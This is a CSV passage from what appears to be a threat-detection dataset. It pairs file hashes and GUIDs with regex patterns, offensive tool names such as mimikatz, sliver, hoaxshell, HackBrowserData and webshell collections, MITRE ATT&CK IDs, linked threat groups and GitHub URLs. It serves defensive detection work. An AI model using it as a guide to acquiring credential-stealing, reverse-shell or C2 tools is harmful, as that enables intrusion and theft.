"*8BFC8ED2-71CC-49DC-9020-2C8199BC27B6*",".{0,1000}8BFC8ED2\-71CC\-49DC\-9020\-2C8199BC27B6.{0,1000}","offensive_tool_keyword","DcRat","DcRat C2 A simple remote tool in C#","T1071 - T1021 - T1003","TA0011","N/A","N/A","Malware","https://github.com/qwqdanchun/DcRat","1","0","#GUIDproject","N/A","10","10","968","332","2022-02-07T05:37:09Z","2021-03-12T11:00:37Z","30721"
"*8c038621b5807a443d8bf7344f1df9defe0e8193a55efdda8b0e08d0923c3c9e*",".{0,1000}8c038621b5807a443d8bf7344f1df9defe0e8193a55efdda8b0e08d0923c3c9e.{0,1000}","offensive_tool_keyword","traitor","Automatically exploit low-hanging fruit to pop a root shell. Linux privilege escalation made easy","T1068 - T1548.004 - T1611 - T1203 - T1059.004","TA0004 - TA0001 - TA0002 - TA0005","N/A","N/A","Privilege Escalation","https://github.com/liamg/traitor","1","0","#linux #filehash","N/A","10","10","6853","651","2024-03-12T21:01:14Z","2021-01-24T10:50:15Z","30724"
"*8c05ab157066ba6d94b843a1eb0732371e23a2feeb2e7522d48e9d421f50ed96*",".{0,1000}8c05ab157066ba6d94b843a1eb0732371e23a2feeb2e7522d48e9d421f50ed96.{0,1000}","offensive_tool_keyword","sharphound","C# Data Collector for BloodHound","T1087.001 - T1087.002 - T1482 - T1016 - T1018 - T1046","TA0007 - TA0043 - TA0005 - TA0042","Dispossessor - Trickbot - Dridex - Locky - Uyghur - BlackCat - ALPHV - Defray777 - RansomExx","APT20 - TA505 - APT29 - GOLD DUPONT - Scattered Spider - UNC3944 - TA2101 - Wizard Spider - Grim Spider - Lunar Spider - Dispossessor","Discovery","https://github.com/BloodHoundAD/SharpHound","1","0","#filehash","N/A","N/A","10","904","195","2025-04-18T20:45:04Z","2021-07-12T17:07:04Z","30725"
"*8c1007a1d0abce7187cc43079832d6b2b9510aee7c15e1eb2f322d8cc854cf3b*",".{0,1000}8c1007a1d0abce7187cc43079832d6b2b9510aee7c15e1eb2f322d8cc854cf3b.{0,1000}","offensive_tool_keyword","sharpcollection","Nightly builds of common C# offensive tools. fresh from their respective master branches built and released in a CDI fashion using Azure DevOps release pipelines.","T1059 - T1027 - T1036 - T1562 - T1045 - T1024 - T1070 - T1574 - T1071 - T1078 - T1003 - T1072 - T1075 - T1077 - T1079 - T1083 - T1105 - T1106 - T1120 - T1135 - T1158 - T1204 - T1214 - T1215 - T1220 - T1221 - T1222 - T1223 - T1224 - T1227 - T1247 - T12","TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0010 - TA0011","N/A","Black Basta","Exploitation tool","https://github.com/Flangvik/SharpCollection","1","0","#filehash","N/A","10","10","2452","358","2025-04-18T03:38:55Z","2020-06-05T12:50:00Z","30727"
"*8c18fe10b673b128e86bb6f1b6dd34eae23c4428ec66e8496d94fd04cfc17784*",".{0,1000}8c18fe10b673b128e86bb6f1b6dd34eae23c4428ec66e8496d94fd04cfc17784.{0,1000}","offensive_tool_keyword","mimikatz","mimikatz archives hashes","T1134.005 - T1098 - T1547.005 - T1555 - T1555.003 - T1555.004 - T1003.001 - T1003.002 - T1003.004 - T1003.006 - T1207 - T1649 - T1558.001 - T1558.002 - T1552.004 - T1550.002 - T1550.003","TA0004 - TA0006 - TA0003 - TA0008 - TA0009","N/A","Black Basta - APT1 - APT24 - APT28 - APT29 - APT32 - APT33 - APT38 - APT39 - APT41 - APT5 - Akira - Avivore  - BERSERK BEAR - BOSS SPIDER - BRONZE BUTLER - BackdoorDiplomacy - Blue Mockingbird - CHRYSENE - COZY BEAR - Carbanak - Chamelgang - Chimera - Cleaver - Cobalt Group - DarkHydrus - Dragonfly - Earth Lusca - FANCY BEAR - FIN13 - FIN6 - FIN7 - GALLIUM - Gamaredon - HEXANE - Indrik Spider - Ke3chang - Kimsuky - LAPSUS$ - Leafminer - Magic Hound - MuddyWater - OilRig - PittyTiger - Sandworm Team - Scattered Spider - TA505 - TEMP.Veles - Threat Group-3390 - Thrip - Tonto Team - Turla - Unit 29155 - Volt Typhoon - Whitefly - Wizard Spider - menuPass - Dispossessor - DragonForce - Sphinx","Credential Access","https://github.com/gentilkiwi/mimikatz","1","0","#filehash","N/A","10","10","20094","3854","2024-07-05T17:42:58Z","2014-04-06T18:30:02Z","30728"
"*8c18fe10b673b128e86bb6f1b6dd34eae23c4428ec66e8496d94fd04cfc17784*",".{0,1000}8c18fe10b673b128e86bb6f1b6dd34eae23c4428ec66e8496d94fd04cfc17784.{0,1000}","offensive_tool_keyword","mimikatz","mimikatz archives hashes","T1134.005 - T1098 - T1547.005 - T1555 - T1555.003 - T1555.004 - T1003.001 - T1003.002 - T1003.004 - T1003.006 - T1207 - T1649 - T1558.001 - T1558.002 - T1552.004 - T1550.002 - T1550.003","TA0004 - TA0006 - TA0003 - TA0008 - TA0009","N/A","Black Basta - APT1 - APT24 - APT28 - APT29 - APT32 - APT33 - APT38 - APT39 - APT41 - APT5 - Akira - Avivore  - BERSERK BEAR - BOSS SPIDER - BRONZE BUTLER - BackdoorDiplomacy - Blue Mockingbird - CHRYSENE - COZY BEAR - Carbanak - Chamelgang - Chimera - Cleaver - Cobalt Group - DarkHydrus - Dragonfly - Earth Lusca - FANCY BEAR - FIN13 - FIN6 - FIN7 - GALLIUM - Gamaredon - HEXANE - Indrik Spider - Ke3chang - Kimsuky - LAPSUS$ - Leafminer - Magic Hound - MuddyWater - OilRig - PittyTiger - Sandworm Team - Scattered Spider - TA505 - TEMP.Veles - Threat Group-3390 - Thrip - Tonto Team - Turla - Unit 29155 - Volt Typhoon - Whitefly - Wizard Spider - menuPass - Dispossessor - DragonForce - Sphinx","Credential Access","https://github.com/gentilkiwi/mimikatz","1","0","#filehash","N/A","10","10","20094","3854","2024-07-05T17:42:58Z","2014-04-06T18:30:02Z","30729"
"*8c1e9d935d60c007bd43d10b206cd229c851b654562e6bb93ce009481d827afb*",".{0,1000}8c1e9d935d60c007bd43d10b206cd229c851b654562e6bb93ce009481d827afb.{0,1000}","offensive_tool_keyword","HackBrowserData","Decrypt passwords/cookies/history/bookmarks from the browser","T1555.003 - T1552.001","TA0006 - TA0009 - TA0010","N/A","N/A","Credential Access","https://github.com/moonD4rk/HackBrowserData","1","0","#filehash","N/A","N/A","10","12216","1656","2025-04-06T01:32:13Z","2020-06-18T03:24:31Z","30733"
"*8c34fc93d2e71f3faeaa17b1507a70d87e09ec7bafd7922dff22ba887c304db5*",".{0,1000}8c34fc93d2e71f3faeaa17b1507a70d87e09ec7bafd7922dff22ba887c304db5.{0,1000}","offensive_tool_keyword","sharpcollection","Nightly builds of common C# offensive tools. fresh from their respective master branches built and released in a CDI fashion using Azure DevOps release pipelines.","T1059 - T1027 - T1036 - T1562 - T1045 - T1024 - T1070 - T1574 - T1071 - T1078 - T1003 - T1072 - T1075 - T1077 - T1079 - T1083 - T1105 - T1106 - T1120 - T1135 - T1158 - T1204 - T1214 - T1215 - T1220 - T1221 - T1222 - T1223 - T1224 - T1227 - T1247 - T12","TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0010 - TA0011","N/A","Black Basta","Exploitation tool","https://github.com/Flangvik/SharpCollection","1","0","#filehash","N/A","10","10","2452","358","2025-04-18T03:38:55Z","2020-06-05T12:50:00Z","30736"
"*8c368864f6d59eac9603c8ad0099a32a1648be13c9cf69658174db3921d6c30c*",".{0,1000}8c368864f6d59eac9603c8ad0099a32a1648be13c9cf69658174db3921d6c30c.{0,1000}","offensive_tool_keyword","NetExec","NetExec (a.k.a nxc) is a post-exploitation tool that helps automate assessing the security of large Active Directory networks.","T1110 - T1135 - T1047 - T1078 - T1087 - T1021","TA0006 - TA0007 - TA0003 - TA0008 - TA0005","N/A","N/A","Exploitation tool","https://github.com/Pennyw0rth/NetExec","1","0","#filehash","N/A","10","10","4066","459","2025-04-20T00:08:29Z","2023-09-08T15:36:00Z","30738"
"*8c3c68f026da1de92c0162f38b509ee335041b7cf5f861fce1d38b053287c866*",".{0,1000}8c3c68f026da1de92c0162f38b509ee335041b7cf5f861fce1d38b053287c866.{0,1000}","offensive_tool_keyword","Godzilla","Webshell Manager Tool that provide request proxy, server info, RCE shell, terminal execution, memory shell, port forwarding, and MSF bind/reverse shell capabilities.","T1100 - T1018 - T1059 - T1090 - T1021 - T1205 - T1105 - T1568","TA0001 - TA0002 - TA0003 - TA0011","N/A","N/A","C2","https://github.com/BeichenDream/Godzilla","1","0","#filehash","N/A","10","10","4096","551","2024-07-17T07:56:35Z","2020-08-17T17:27:56Z","30741"
"*8c434e4c9fa572dd95d94193f9671e039fb8dd1705cf4c841aaa1969ce9dae2e*",".{0,1000}8c434e4c9fa572dd95d94193f9671e039fb8dd1705cf4c841aaa1969ce9dae2e.{0,1000}","offensive_tool_keyword","Argus","Information Gathering Toolkit","T1590.001 - T1590.002 - T1595.003 - T1016 - T1046 - T1590.005","TA0043 - TA0007","N/A","N/A","Reconnaissance","https://github.com/jasonxtn/Argus","1","0","#filehash","N/A","4","10","1951","210","2024-10-08T19:04:27Z","2024-10-01T22:13:51Z","30744"
"*8c484c384d66dd2821b9f1d4f963ae897fbf539b2ab495f3e93344635eb76f18*",".{0,1000}8c484c384d66dd2821b9f1d4f963ae897fbf539b2ab495f3e93344635eb76f18.{0,1000}","offensive_tool_keyword","hoaxshell","An unconventional Windows reverse shell. currently undetected by Microsoft Defender and various other AV solutions. solely based on http(s) traffic","T1059 - T1071 - T1071.001 - T1203","TA0002 - TA0011","N/A","N/A","C2","https://github.com/t3l3machus/hoaxshell","1","0","#filehash","N/A","N/A","10","3212","499","2025-01-19T12:29:35Z","2022-07-10T15:36:24Z","30747"
"*8c489222246bc16d65bb4b26ad5294a40fc314d9e99bd6feb65d6bc9f0bb7a9c*",".{0,1000}8c489222246bc16d65bb4b26ad5294a40fc314d9e99bd6feb65d6bc9f0bb7a9c.{0,1000}","offensive_tool_keyword","PEASS-ng","PEASS-ng - Privilege Escalation Awesome Scripts suite","T1098","TA0004 - TA0005","N/A","Scattered Spider* - PLAY - EMBER BEAR - COZY BEAR - Dispossessor","Privilege Escalation","https://github.com/peass-ng/PEASS-ng","1","0","#filehash","N/A","10","10","17347","3209","2025-04-01T04:29:00Z","2019-01-13T19:58:24Z","30748"
"*8c4b014b68d484905681e4055a154490ad2d48b732022b35eff98ee94c4d8232*",".{0,1000}8c4b014b68d484905681e4055a154490ad2d48b732022b35eff98ee94c4d8232.{0,1000}","offensive_tool_keyword","webshell","collection of webshell - observed used by famous webshells","T1100 - T1027 - T1059 - T1105","TA0003 - TA0005 - TA0011 - TA0002","N/A","N/A","C2","https://github.com/tennc/webshell","1","0","#filehash","N/A","9","10","10344","5595","2024-12-24T15:37:05Z","2013-05-23T07:37:56Z","30749"
"*8c56340487f6954e6379a332d5297f5c9041c5bd5167b06ee8e87f1f65901e33*",".{0,1000}8c56340487f6954e6379a332d5297f5c9041c5bd5167b06ee8e87f1f65901e33.{0,1000}","offensive_tool_keyword","Malware RAT collection","from Malware RAT samples","T1105 - T1059 - T1109 - T1016 - T1071.001 - T1082 - T1027 - T1083 - T1056 - T1106 - T1078 - T1053","TA0011 - TA0009 - TA0006 - TA0003 - TA0002 - TA0005 - TA0007","N/A","N/A","Malware","https://github.com/x-cod3r/Remote-administration-tools-archive","1","0","#filehash","N/A","9","1","93","30","2023-10-03T15:08:22Z","2023-10-03T13:09:00Z","30752"
"*8c6291f935445adc486c03da6169b471fc2436d5b594972b14eaeb37350aa3ef*",".{0,1000}8c6291f935445adc486c03da6169b471fc2436d5b594972b14eaeb37350aa3ef.{0,1000}","offensive_tool_keyword","HackBrowserData","Decrypt passwords/cookies/history/bookmarks from the browser","T1555.003 - T1552.001","TA0006 - TA0009 - TA0010","N/A","N/A","Credential Access","https://github.com/moonD4rk/HackBrowserData","1","0","#filehash","N/A","N/A","10","12216","1656","2025-04-06T01:32:13Z","2020-06-18T03:24:31Z","30754"
"*8c6fb15cbc44a898922c14019dd37452cabbebaffd16823646aff4d886d5a75e*",".{0,1000}8c6fb15cbc44a898922c14019dd37452cabbebaffd16823646aff4d886d5a75e.{0,1000}","offensive_tool_keyword","ObfuscatedSharpCollection","obfuscated Sharp Offensive tools","T1003 - T1059 - T1087 - T1555 - T1078 - T1213 - T1569 - T1548 - T1071 - T1566","TA0006 - TA0005 - TA0003 - TA0002 - TA0004 - TA0008","N/A","Black Basta","Exploitation tool","https://github.com/Flangvik/ObfuscatedSharpCollection","1","0","#filehash","N/A","10","3","206","30","2025-04-18T03:11:19Z","2023-05-14T18:36:15Z","30755"
"*8c7137030d9653611f63d82c0dbc8354ae13a1e601bc86e94ca83fd64c28f274*",".{0,1000}8c7137030d9653611f63d82c0dbc8354ae13a1e601bc86e94ca83fd64c28f274.{0,1000}","offensive_tool_keyword","webshell","collection of webshell - observed used by famous webshells","T1100 - T1027 - T1059 - T1105","TA0003 - TA0005 - TA0011 - TA0002","N/A","N/A","C2","https://github.com/tennc/webshell","1","0","#filehash","N/A","9","10","10344","5595","2024-12-24T15:37:05Z","2013-05-23T07:37:56Z","30756"
"*8c71bcc0680bd7c69fd58639a6748d26202caab6d639f9b92eb394e6648bce0e*",".{0,1000}8c71bcc0680bd7c69fd58639a6748d26202caab6d639f9b92eb394e6648bce0e.{0,1000}","offensive_tool_keyword","arsenal","Arsenal is just a quick inventory and launcher for hacking programs","T1596 - T1587","TA0042 - TA0001","N/A","N/A","Exploitation tool","https://github.com/Orange-Cyberdefense/arsenal","1","0","#filehash","commands cheat sheets","8","10","3399","511","2024-11-29T14:48:20Z","2020-09-02T13:24:50Z","30757"
"*8c7511cc6dae84071080a37c2842782cc0635f8d32301afebdc818a392a58bc3*",".{0,1000}8c7511cc6dae84071080a37c2842782cc0635f8d32301afebdc818a392a58bc3.{0,1000}","offensive_tool_keyword","gsocket","The Global Socket Tookit allows two users behind NAT/Firewall to establish a TCP connection with each other. Securely.","T1572","TA0011 - TA0003","N/A","N/A","C2","https://github.com/hackerschoice/gsocket","1","0","#filehash","N/A","10","10","1671","142","2025-04-22T14:47:29Z","2020-09-18T16:14:22Z","30758"
"*8c763214b528d61ef64a39db9b01deb16f2a550e3f2e8fbc530fb982860f682f*",".{0,1000}8c763214b528d61ef64a39db9b01deb16f2a550e3f2e8fbc530fb982860f682f.{0,1000}","offensive_tool_keyword","ObfuscatedSharpCollection","obfuscated Sharp Offensive tools","T1003 - T1059 - T1087 - T1555 - T1078 - T1213 - T1569 - T1548 - T1071 - T1566","TA0006 - TA0005 - TA0003 - TA0002 - TA0004 - TA0008","N/A","Black Basta","Exploitation tool","https://github.com/Flangvik/ObfuscatedSharpCollection","1","0","#filehash","N/A","10","3","206","30","2025-04-18T03:11:19Z","2023-05-14T18:36:15Z","30759"
"*8c78f5d5b2668b66f9c306a1c1860d64489582fc757a96f6a9e9a8800f4ec11d*",".{0,1000}8c78f5d5b2668b66f9c306a1c1860d64489582fc757a96f6a9e9a8800f4ec11d.{0,1000}","offensive_tool_keyword","dnspot","End-to-end Encrypted DNS Tunnelling and C2 framework","T1071.004 - T1090.002 - T1573.002","TA0011 - TA0010 - TA0005","N/A","N/A","C2","https://github.com/mosajjal/dnspot","1","0","#filehash","N/A","10","10","73","16","2025-02-01T08:13:29Z","2021-09-25T08:49:43Z","30761"
"*8c7bda923eb22fbe0961f2bb9585ceaac8e0c447116ec87979ae44b6a2699ac1*",".{0,1000}8c7bda923eb22fbe0961f2bb9585ceaac8e0c447116ec87979ae44b6a2699ac1.{0,1000}","offensive_tool_keyword","sliver","Sliver is an open source cross-platform adversary emulation/red team framework","T1105 - T1071.004 - T1021 - T1573.001 - T1132 - T1095 - T1041 - T1074.002 - T1568.002 - T1204 - T1055.012","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0010 - TA0011 - TA0040 - TA0042 - TA0043","N/A","AvosLocker - APT29 - Cinnamon Tempest - GOLD CABIN - COZY BEAR - Black Basta","C2","https://github.com/BishopFox/sliver","1","0","#filehash","N/A","10","10","9218","1249","2025-04-21T17:52:43Z","2019-01-17T22:07:38Z","30762"
"*8c7c04928a927b1763b2ed933232863cd3d7a4bcfe787425234cb8fb0d499f55*",".{0,1000}8c7c04928a927b1763b2ed933232863cd3d7a4bcfe787425234cb8fb0d499f55.{0,1000}","offensive_tool_keyword","tun2socks","socks tunneling","T1572 - T1090 - T1071 - T1573 - T1205","TA0010 - TA0011 - TA0008 - TA0005","N/A","N/A","C2","https://github.com/xjasonlyu/tun2socks","1","0","#filehash","N/A","10","10","3785","513","2025-04-15T21:19:25Z","2019-07-16T03:25:40Z","30763"
"*8c7d64cec00aafa23884f1bb28337ef6ce49f2f90605800217f635526e38541d*",".{0,1000}8c7d64cec00aafa23884f1bb28337ef6ce49f2f90605800217f635526e38541d.{0,1000}","offensive_tool_keyword","NoArgs","NoArgs is a tool designed to dynamically spoof and conceal process arguments while staying undetected. It achieves this by hooking into Windows APIs to dynamically manipulate the Windows internals on the go. This allows NoArgs to alter process arguments discreetly.","T1055 - T1574 - T1112 - T1056","TA0005 - TA0040 - TA0009","N/A","N/A","Defense Evasion","https://github.com/oh-az/NoArgs","1","0","#filehash","N/A","8","2","151","25","2024-05-07T20:38:34Z","2024-03-15T16:54:49Z","30764"
"*8c81afc8fcbd100d5793d4c31399e10132f74c77212655c73799ebea7fe95dc3*",".{0,1000}8c81afc8fcbd100d5793d4c31399e10132f74c77212655c73799ebea7fe95dc3.{0,1000}","offensive_tool_keyword","SharpFtpC2","A Streamlined FTP-Driven Command and Control Conduit for Interconnecting Remote Systems","T1071.002 - T1105 - T1090.001","TA0011","N/A","N/A","C2","https://github.com/PhrozenIO/SharpFtpC2","1","0","#filehash","N/A","10","10","88","15","2023-11-09T10:37:20Z","2023-06-09T12:41:28Z","30765"
"*8c842d7dfb5c081a394e645377db303da5228ee78ff9467c4f00534ba8e0c389*",".{0,1000}8c842d7dfb5c081a394e645377db303da5228ee78ff9467c4f00534ba8e0c389.{0,1000}","offensive_tool_keyword","panix","PANIX is a highly customizable Linux persistence tool","T1068 - T1543.003 - T1546.004 - T1169 - T1059 - T1136.001 - T1546.001 - T1078.003 - T1564.001 - T1053 - T1003.008 - T1543.002 - T1053.002 - T1546.012","TA0003 - TA0004 - TA0005","N/A","N/A","Persistence","https://github.com/Aegrah/PANIX","1","0","#filehash #linux","N/A","8","7","622","68","2025-03-05T10:45:04Z","2024-05-19T12:37:40Z","30766"
"*8c866a47872113274363ad6f3ca399d6e3cb45b99ce5e47a579ef1eb31fb0bcf*",".{0,1000}8c866a47872113274363ad6f3ca399d6e3cb45b99ce5e47a579ef1eb31fb0bcf.{0,1000}","offensive_tool_keyword","impacket","Impacket is a collection of Python classes for working with network protocols. Impacket is focused on providing low-level programmatic access to the packets and for some protocols (e.g. SMB1-3 and MSRPC) the protocol implementation itself","T1557.001 - T1040 - T1003.001 - T1003.002 - T1003.003 - T1003.004 - T1558.003 - T1569.002 - T1047","TA0001 - TA0003 - TA0004 - TA0005 - TA0006 - TA0008 - TA0011","N/A","Akira - Bassterlord* - BianLian - Dragonfly - FIN8 - HAFNIUM - Hive - LockBit - Magic Hound - RansomHub - Rhysida - Sandworm Team - Scattered Spider* - Threat Group-3390 - Yanluowang - menuPass - Volt Typhoon - Cinnamon Tempest - Magic Hound - DAGGER PANDA - ENERGETIC BEAR - DEV-0270 - COZY BEAR - FANCY BEAR  - EMBER BEAR - BERSERK BEAR - Dispossessor - Black Basta","Lateral Movement","https://github.com/fortra/impacket","1","0","#filehash","N/A","10","10","14198","3681","2025-04-22T13:40:55Z","2015-04-15T14:04:07Z","30767"
"*8c86f67b69545b19ac0260756440ec1f44ca63ce7cfde3a532a0f4ad6ae883e8*",".{0,1000}8c86f67b69545b19ac0260756440ec1f44ca63ce7cfde3a532a0f4ad6ae883e8.{0,1000}","offensive_tool_keyword","nps","chinese intranet penetration proxy server","T1090 - T1071 - T1102 - T1075 - T1133","TA0002 - TA0011 - TA0010","N/A","N/A","Defense Evasion","https://github.com/yisier/nps","1","0","#filehash","N/A","9","10","2674","327","2025-04-17T09:43:50Z","2022-09-14T06:24:00Z","30768"
"*8c8f3bc0d9ae33057bcbdb5e048691411bcefcb5c09c61951a7675237aa91b67*",".{0,1000}8c8f3bc0d9ae33057bcbdb5e048691411bcefcb5c09c61951a7675237aa91b67.{0,1000}","offensive_tool_keyword","webshell","collection of webshell - observed used by famous webshells","T1100 - T1027 - T1059 - T1105","TA0003 - TA0005 - TA0011 - TA0002","N/A","N/A","C2","https://github.com/tennc/webshell","1","0","#filehash","N/A","9","10","10344","5595","2024-12-24T15:37:05Z","2013-05-23T07:37:56Z","30769"
"*8c90af89b3f0c90d39396210b6dc8dc19ff9e5ce183463a01affa6d30c5d7414*",".{0,1000}8c90af89b3f0c90d39396210b6dc8dc19ff9e5ce183463a01affa6d30c5d7414.{0,1000}","offensive_tool_keyword","Lockless","Lockless allows for the copying of locked files.","T1074 - T1020 - T1055","TA0009 - TA0010 - TA0005","N/A","N/A","Defense Evasion","https://github.com/GhostPack/Lockless","1","0","#filehash","N/A","8","3","245","57","2021-04-30T17:51:41Z","2020-03-28T20:57:25Z","30770"
"*8c936f3b5bcd9dbb20a4d0602cdf26fbf3efe681134f20e510acda6561526623*",".{0,1000}8c936f3b5bcd9dbb20a4d0602cdf26fbf3efe681134f20e510acda6561526623.{0,1000}","offensive_tool_keyword","sharpcollection","Nightly builds of common C# offensive tools. fresh from their respective master branches built and released in a CDI fashion using Azure DevOps release pipelines.","T1059 - T1027 - T1036 - T1562 - T1045 - T1024 - T1070 - T1574 - T1071 - T1078 - T1003 - T1072 - T1075 - T1077 - T1079 - T1083 - T1105 - T1106 - T1120 - T1135 - T1158 - T1204 - T1214 - T1215 - T1220 - T1221 - T1222 - T1223 - T1224 - T1227 - T1247 - T12","TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0010 - TA0011","N/A","Black Basta","Exploitation tool","https://github.com/Flangvik/SharpCollection","1","0","#filehash","N/A","10","10","2452","358","2025-04-18T03:38:55Z","2020-06-05T12:50:00Z","30771"
"*8c96263d8ba4427c67bef9f7fc7bc57c04c6fb61849a19599cc52503fd701daa*",".{0,1000}8c96263d8ba4427c67bef9f7fc7bc57c04c6fb61849a19599cc52503fd701daa.{0,1000}","offensive_tool_keyword","dnspot","End-to-end Encrypted DNS Tunnelling and C2 framework","T1071.004 - T1090.002 - T1573.002","TA0011 - TA0010 - TA0005","N/A","N/A","C2","https://github.com/mosajjal/dnspot","1","0","#filehash","N/A","10","10","73","16","2025-02-01T08:13:29Z","2021-09-25T08:49:43Z","30772"
"*8c97b09ebb432e60c9aef665c6db2be79a6439f1c59f683f36568f0bddda0c38*",".{0,1000}8c97b09ebb432e60c9aef665c6db2be79a6439f1c59f683f36568f0bddda0c38.{0,1000}","offensive_tool_keyword","mimikatz","mimikatz archives hashes","T1134.005 - T1098 - T1547.005 - T1555 - T1555.003 - T1555.004 - T1003.001 - T1003.002 - T1003.004 - T1003.006 - T1207 - T1649 - T1558.001 - T1558.002 - T1552.004 - T1550.002 - T1550.003","TA0004 - TA0006 - TA0003 - TA0008 - TA0009","N/A","Black Basta - APT1 - APT24 - APT28 - APT29 - APT32 - APT33 - APT38 - APT39 - APT41 - APT5 - Akira - Avivore  - BERSERK BEAR - BOSS SPIDER - BRONZE BUTLER - BackdoorDiplomacy - Blue Mockingbird - CHRYSENE - COZY BEAR - Carbanak - Chamelgang - Chimera - Cleaver - Cobalt Group - DarkHydrus - Dragonfly - Earth Lusca - FANCY BEAR - FIN13 - FIN6 - FIN7 - GALLIUM - Gamaredon - HEXANE - Indrik Spider - Ke3chang - Kimsuky - LAPSUS$ - Leafminer - Magic Hound - MuddyWater - OilRig - PittyTiger - Sandworm Team - Scattered Spider - TA505 - TEMP.Veles - Threat Group-3390 - Thrip - Tonto Team - Turla - Unit 29155 - Volt Typhoon - Whitefly - Wizard Spider - menuPass - Dispossessor - DragonForce - Sphinx","Credential Access","https://github.com/gentilkiwi/mimikatz","1","0","#filehash","N/A","10","10","20094","3854","2024-07-05T17:42:58Z","2014-04-06T18:30:02Z","30773"
"*8c97b09ebb432e60c9aef665c6db2be79a6439f1c59f683f36568f0bddda0c38*",".{0,1000}8c97b09ebb432e60c9aef665c6db2be79a6439f1c59f683f36568f0bddda0c38.{0,1000}","offensive_tool_keyword","mimikatz","mimikatz archives hashes","T1134.005 - T1098 - T1547.005 - T1555 - T1555.003 - T1555.004 - T1003.001 - T1003.002 - T1003.004 - T1003.006 - T1207 - T1649 - T1558.001 - T1558.002 - T1552.004 - T1550.002 - T1550.003","TA0004 - TA0006 - TA0003 - TA0008 - TA0009","N/A","Black Basta - APT1 - APT24 - APT28 - APT29 - APT32 - APT33 - APT38 - APT39 - APT41 - APT5 - Akira - Avivore  - BERSERK BEAR - BOSS SPIDER - BRONZE BUTLER - BackdoorDiplomacy - Blue Mockingbird - CHRYSENE - COZY BEAR - Carbanak - Chamelgang - Chimera - Cleaver - Cobalt Group - DarkHydrus - Dragonfly - Earth Lusca - FANCY BEAR - FIN13 - FIN6 - FIN7 - GALLIUM - Gamaredon - HEXANE - Indrik Spider - Ke3chang - Kimsuky - LAPSUS$ - Leafminer - Magic Hound - MuddyWater - OilRig - PittyTiger - Sandworm Team - Scattered Spider - TA505 - TEMP.Veles - Threat Group-3390 - Thrip - Tonto Team - Turla - Unit 29155 - Volt Typhoon - Whitefly - Wizard Spider - menuPass - Dispossessor - DragonForce - Sphinx","Credential Access","https://github.com/gentilkiwi/mimikatz","1","0","#filehash","N/A","10","10","20094","3854","2024-07-05T17:42:58Z","2014-04-06T18:30:02Z","30774"
"*8ca0c007508cf3a82966fe31b44d3917cb2d22e903bde3738565ffbe88f7fb8d*",".{0,1000}8ca0c007508cf3a82966fe31b44d3917cb2d22e903bde3738565ffbe88f7fb8d.{0,1000}","offensive_tool_keyword","PEASS-ng","PEASS-ng - Privilege Escalation Awesome Scripts suite","T1098","TA0004 - TA0005","N/A","Scattered Spider* - PLAY - EMBER BEAR - COZY BEAR - Dispossessor","Privilege Escalation","https://github.com/peass-ng/PEASS-ng","1","0","#filehash","N/A","10","10","17347","3209","2025-04-01T04:29:00Z","2019-01-13T19:58:24Z","30775"
"*8cb1941c10e1fe16ee47229229d2ad1a95e9d356d12a5e7f31246d348b1d2419*",".{0,1000}8cb1941c10e1fe16ee47229229d2ad1a95e9d356d12a5e7f31246d348b1d2419.{0,1000}","offensive_tool_keyword","precompiled-binaries","executables for penetration testing Windows Active Directory environments","T1016 - T1046 - T1087 - T1082 - T1055 - T1068 - T1083 - T1012 - T1558 - T1097 - T1077 - T1134 - T1550 - T1078 - T1021 - T1072 - T1484 - T1553 - T1557 - T1003 - T1555 - T1134 - T1055 - T1088","TA0007 - TA0008 - TA0004 - TA0006 - TA0002 - TA0005","N/A","N/A","Exploitation tool","https://github.com/jakobfriedl/precompiled-binaries","1","0","#filehash","N/A","10","2","138","38","2025-03-06T13:02:11Z","2023-08-08T12:21:46Z","30777"
"*8cb1ea0098cf975a1ad6d61b2a387f8acf09ef8576ea836f838aa6ac9c0fb0fb*",".{0,1000}8cb1ea0098cf975a1ad6d61b2a387f8acf09ef8576ea836f838aa6ac9c0fb0fb.{0,1000}","offensive_tool_keyword","pyrdp","RDP monster-in-the-middle (mitm) and library for Python with the ability to watch connections live or after the fact","T1550.002 - T1059.006 - T1071.001","TA0002 - TA0010","N/A","N/A","Sniffing & Spoofing","https://github.com/GoSecure/pyrdp","1","0","#filehash","can also be used by blueteam as a honeypot","10","10","1663","257","2025-03-13T05:11:26Z","2018-09-07T19:17:41Z","30778"
"*8cb248d6558fad8e94bc615b3db1ec567c6d9cd30d48f4dc58af4449d626abf7*",".{0,1000}8cb248d6558fad8e94bc615b3db1ec567c6d9cd30d48f4dc58af4449d626abf7.{0,1000}","offensive_tool_keyword","taowu-cobalt-strike","Collection of hacktools binaries","T1003 - T1059 - T1087 - T1110 - T1135 - T1047 - T1078 - T1086 - T1098 - T1212 - T1021 - T1056 - T1071 - T1210 - T1484 - T1555 - T1055 - T1005 - T1090 - T1080 - T1204 - T1496 - T1114 - T1562 - T1482 - T1505 - T1548 - T1560 - T1566 - T1218 - T1547 - T1070 - T1206 - T1208","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0010 - TA0011","N/A","N/A","Exploitation tool","https://github.com/pandasec888/taowu-cobalt_strike/tree/312fec79b3413ecfc06bc43efccfcbc1383a3566","1","0","#filehash","N/A","10","10","1797","330","2023-10-31T09:13:10Z","2020-07-05T10:13:00Z","30779"
"*8cb4a31c-11c4-49e4-8c7a-b9c6df93f5d8*",".{0,1000}8cb4a31c\-11c4\-49e4\-8c7a\-b9c6df93f5d8.{0,1000}","offensive_tool_keyword","ShimMe","Injects a DLL into a suspended process running as SYSTEM via the OfficeClickToRun service for privilege escalation - Shim Injector: Injects a DLL into a process by modifying shim data in memory without creating or registering new SDB files to evade detection.","T1055 - T1053 - T1548.002 - T1078 - T1546 - T1070","TA0004 - TA0005 - TA0006 - TA0009","N/A","N/A","Privilege Escalation","https://github.com/deepinstinct/ShimMe","1","0","#GUIDproject","N/A","9","2","140","20","2024-10-29T07:33:38Z","2024-08-04T10:03:28Z","30780"
